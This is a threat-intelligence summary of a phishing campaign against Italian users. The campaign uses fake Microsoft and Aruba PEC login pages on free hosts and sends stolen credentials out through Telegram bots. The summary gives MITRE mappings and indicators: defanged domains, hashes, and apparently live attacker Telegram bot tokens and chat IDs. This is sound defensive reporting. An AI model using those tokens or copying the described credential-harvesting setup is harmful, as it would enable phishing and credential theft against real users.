This analysis explores a phishing campaign targeting Italian users through fake Microsoft and Aruba PEC login pages, leveraging Telegram bots for data exfiltration. The campaign uses free hosting platforms like Notion and Glitch, employs straightforward phishing techniques, and remains active with low operational tempo. #PhishingCampaign #TelegramBots #CredentialHarvesting #Microsoft365 #ArubaPEC #ItalianUsers
Keypoints
- The phishing campaign targets Italian-speaking users, impersonating Microsoft (OneNote, Office365) and Aruba PEC login portals.
- Phishing pages are hosted on free platforms such as Notion workspaces, Glitch, Google Docs, and RenderForest.
- User credentials and IP addresses are exfiltrated via hardcoded Telegram bots using Telegram API tokens and chat IDs.
- The campaign has been active since at least early 2022, with recurring samples displaying minor visual changes but consistent exfiltration tactics.
- The attacker’s tooling is rudimentary, with low-quality phishing pages and no advanced evasion or obfuscation techniques except occasional URL encoding and discontinued Base64 encoding.
- Intercepting Telegram bot communications allowed researchers to profile victims and link multiple bots to a suspected threat actor account named “Don.”
- Victims include individuals and businesses primarily in Italy and the United States, across diverse sectors like logistics, certified email, consulting, and natural resources.
MITRE Techniques
- [T1566] Phishing – The campaign uses phishing pages impersonating legitimate login portals to collect user credentials (“phishing pages and email lures impersonating login portals for Microsoft services and Aruba PEC”).
- [T1071] Application Layer Protocol – Data exfiltration occurs via Telegram bots interacting through Telegram API calls (“credentials are exfiltrated via a Telegram bot, with the bot token and chat ID hardcoded directly into the phishing script”).
- [T1598] Phishing via Link – Victims are lured through URLs hosted on Notion and Glitch domains leading to counterfeit authentication pages (“URL chains: Notion → Glitch → Telegram API”).
- [T1552] Unsecured Credentials – Hardcoded Telegram bot tokens and chat IDs are used for data theft (“hardcoded directly into the phishing script”).
- [T1110] Brute Force (Indirect) – Use of credential harvesting for later access brokering rather than direct exploitation (“the campaign’s true value lies in access brokering, not execution”).
- [T1033] System Owner/User Discovery – The campaign collects victim IP addresses using ipify service during the phishing flow (“uses the ipify.org service to retrieve the victim’s IP address”).
Indicators of Compromise
- [Domain] Phishing infrastructure – studiosperandio[.]notion[.]site, gleaming-foregoing-quicksand[.]glitch[.]me, seabbz[.]notion[.]site, f004[.]backblazeb2[.]com, 25348255-1243060[.]renderforestsites[.]com
- [Domain] Urlscan.io related domains – inshared0-onenote-asx[.]pages[.]dev, one driv-shared0-apx[.]pages[.]dev, hampshiredownsheepwales[.]com, kindly-tropical-icicle[.]glitch[.]me
- [Telegram Bot Tokens and Chat IDs] – 7547274214:AAE2ImiQOBUm1JXvTk0sXfZNaZP2J4wL9sE | 6475928726, 7072331661:AAEnFxNxOI162AVQUCmfDHMdy6s4fGrnTZY | 5308217415, 6741707974:AAHGfsh1hk8WVtAfcISXgpZCTL-bpHNvQ_E | 6475928726
- [File Hashes (SHA-256)] – 2049afb27b7d71b311ef83205ec8c1397ed9b705b4f84517471cc41c8c1f29d1, 8a1cecaf7c6df616fae15dca013cea78d209f0e813b9aa75964de1f813d614e0, 7e5a3bb0cff67b2c1ff50544f956a903a6ff364c006033c0887d17019875040e, and 7 more hashes.
Read more: https://any.run/cybersecurity-blog/cybersecurity-blog/adversary-telegram-bot-abuse/